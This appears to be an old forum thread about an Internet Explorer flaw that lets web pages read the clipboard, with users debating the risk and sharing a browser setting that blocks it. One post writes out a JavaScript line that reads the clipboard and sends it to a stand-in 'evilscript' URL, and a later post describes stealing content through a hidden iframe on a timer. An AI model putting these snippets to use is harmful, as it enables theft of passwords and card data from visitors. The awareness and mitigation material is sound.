Security Issue With Ctrl+c/copy On Clipboard

[Revolutionary. 0]

Eek, how many malicious sites are stealing these things from your clipboard? I'd imagine that I'm either not in with the computer scene but I've never seen or heard this kind of exploit mentioned before.A very interesting find, I'm playing around with it now. Thanks.

[SystemWisdom 0]

Wow! Thx for posting that! It is scary enough without knowing that it is mainly one line of code:

 

var content = clipboardData.getData("Text");

 

I will be experimenting with this real soon!!

[mendezgarcia 0]

I knew this and other JS "handy" scripts This "exploit" isn't too dangerous , for many reasons:1. They must know what is in the Clipboard, and IF it was a password (1 chance in 10^5 in my case) from which of the billions of websites on net. Additionally, they must know what was your username.2. They can log the clipboard ONCE. Supposing it (the clipboard) is posted to a script and logged, if the "hacker" wanted to log you again would have to redirect the script back to the JS script (or print it directly). But it would log the same thing again if the Clipboard didn't change. This would eventually slow down the victim's connection or crashing him/her computer. Thus, he/she would never visit your site again.3. In order to log your Clipboard for a long time , the exploiter would have to keep you visiting his site. Not an easy thing, and in this case, there is the also point "2".A side note, Firefox doesn't support ANY clipboard command. Aside from accessing its content, you may use JS to change its content. none works with Firefox, and I don't know if this is a good or bad thing.Conclusion: This is an "exploit" that will be hardly used, and even hardly it will succeed. I personally don't worry, also because I don't copy and paste my passwords.

[mendezgarcia 0]

So, if they want to use it, they have to pass this again to the server by making you click something or submit some form

There is no need to use this.

var content = clipboardData.getData("Text");document.location.replace('http://http://www.afternic.com/domain/evilscript.com;  +content);

What would redirect you to http://www.afternic.com/domain/evilscript.com
And retrieve the value using GET. Or also create a form with hidden values, method=POST and submit it (using setTimeout and form.submit )

There are many ways to silently send the log.

Notice from cmatcmextra:

Fixed quotes. Please form quote tags in future as follows:

[quote=Person or Company Or Site Etc]QUOTED TEXT[/quote]

Forms.....

QUOTED TEXT

Edited September 12, 2005 by cmatcmextra (see edit history)

[OpaQue 15]

I am not soo good at Javascript. But yes, that will also do the trick.

[ashiezai 0]

wow ... i didnt know that copying my text to to clipboard with ctrl+c will render my computer insecure .... thanks for the information man ... i will try not to copy my passwaord anymore ... I will pass this message to my friends ... thanks again ...

[cse-icons 0]

hi mendezgarcia,thanks for ur analysis and points. I myself have not worked much on Javascript. For one thing it may not just be password, but even Credit card information or n number of things.Agree that the hacker must know the website the password is for and the username, but I know a few of my friends who store all this login info ie., website, username and password in a file on their system(since they do not remember all the passwords). Anything might happen by accident. Favoring ur point:Yeah but the chances that a site might just keep on trying to guess are less than 1 in a million.Moreover IE is not the browser that everyone uses. I believe in being careful than regretting later... Since the solution of just switching off the option will not effect the browsing experince of the user in any way. Even if not as a security measure.. this info wud be useful just for awareness.Cheers.

[heavensounds 0]

Thank you very much for the tip...I have just protected myself :PGreetz

[crapoartworks 0]

Now for me, I only know bits of javascript like

javascript:window.close();

and

javascript:history.go(-1);

but what you posted above looks very scary. I hate to think if something was logging my clipboard.....

[bluhapp 0]

me uses firefox. so no ctrl+C probs.. i uses a lot. i mean alot of ctrl + c... thanks to firefox.. great security..

[Dooga 0]

Sometimes, the control C javascript is very usefull, for example, when you press "highlight this" or maybe using the clipboard for something like replacing "variables" etc.

[mendezgarcia 0]

Suppose, You've your letter copied on clipboard and some evil site steals it.I think it is also possible that using JavaScript a webpage may transfer selected text to the clipboard. And then using other methods of clipboard object a site may capture some personal data.

The quoted text above was sent by Sunny using PM, but I thought it would be interesting to talk about it.
Well, yes it IS possible to "transfer" selected text to JS and then send it to an "evil site" or whatever. But this would be a little more complicated thing to do. I'll post a method; there may be others, but they would follow the same structure.

The "exploiter" would have to create a site and trick you to visit it. This site would have 2 frames or iframes; one of them showing the site he wants to "steal" and the other (invisible) actually logging, using setTimeout to regularly copy and send the content.

But I think most of you know about phishing sites (what could be used as well, and it's even simpler) and wouldn't do something like this. Would you?

About capturing personal data, I don't know what you consider "personal data", but Javascript can't touch any files in your computer , except the infamous cookies. But
usually the browsers are disallow JS to access cookies from other sites.

[SystemWisdom 0]

My main purpose for me with this little bit of code (sorry if my last post mislead any of you, hope not) in my opinion, is to display that info on my site for my visitors, with an explanation of what it is, and how to prevent it.. I am personally not too concerned about the exploit for many reasons, many of which have already been discussed, but the main reason it doesn't bother me, is because I don't use CCs on my computer and passwords are only half of the key into any site.. Anyway, my interest is in displaying this info to users, similar to how many sites display the users IP address.. I may even add this handy little code bit to my Dynamic Signature!! :PAgain, thx for posting it! Ima have fun with it!! lol

[sinx 0]

hi friends,

 

We all copy various data by using ctrl+c/Copy for pasting elsewhere.

This copied data is stored on clipboard and is accessible over the net by a combination of Javascripts and ASP.

 

Just try this:

1) Copy any text by ctrl+c

2) Click the Link: http://www.friendlycanadian.com/rg-erdr.php?_rpo=t

3) You will see the text you copied on the Screen which was

accessed by this web page.

 

Moral:

Do not keep sensitive data (like passwords, creditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information. If sufficient data is stored by mistake it would give away confidential and important information without you knowing about it.

 

To Avoid This

To avoid this, follow these steps:

 

1. Go to internet options->security

 

2. Press custom level

 

3. In the security settings, select disable under Allow paste operations via script.

Now the contents of your clipboard are safe.

 

Pass this information on to create an awareness of the same.

 

Safe Browsing,

Cheers.

183457[/snapback]

LoL Nice idea to make some sites .... damn dude never knew this was possible thx !!!!!!!! I am adjusting it at this moment hile !!!!!

[shadowdemon 0]

hi friends,

 

We all copy various data by using ctrl+c/Copy for pasting elsewhere.

This copied data is stored on clipboard and is accessible over the net by a combination of Javascripts and ASP.

 

Just try this:

1) Copy any text by ctrl+c

2) Click the Link: http://www.friendlycanadian.com/rg-erdr.php?_rpo=t

3) You will see the text you copied on the Screen which was

accessed by this web page.

 

Moral:

Do not keep sensitive data (like passwords, creditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information. If sufficient data is stored by mistake it would give away confidential and important information without you knowing about it.

 

To Avoid This

To avoid this, follow these steps:

 

1. Go to internet options->security

 

2. Press custom level

 

3. In the security settings, select disable under Allow paste operations via script.

Now the contents of your clipboard are safe.

 

Pass this information on to create an awareness of the same.

 

Safe Browsing,

Cheers.

183457[/snapback]

i need to learn that code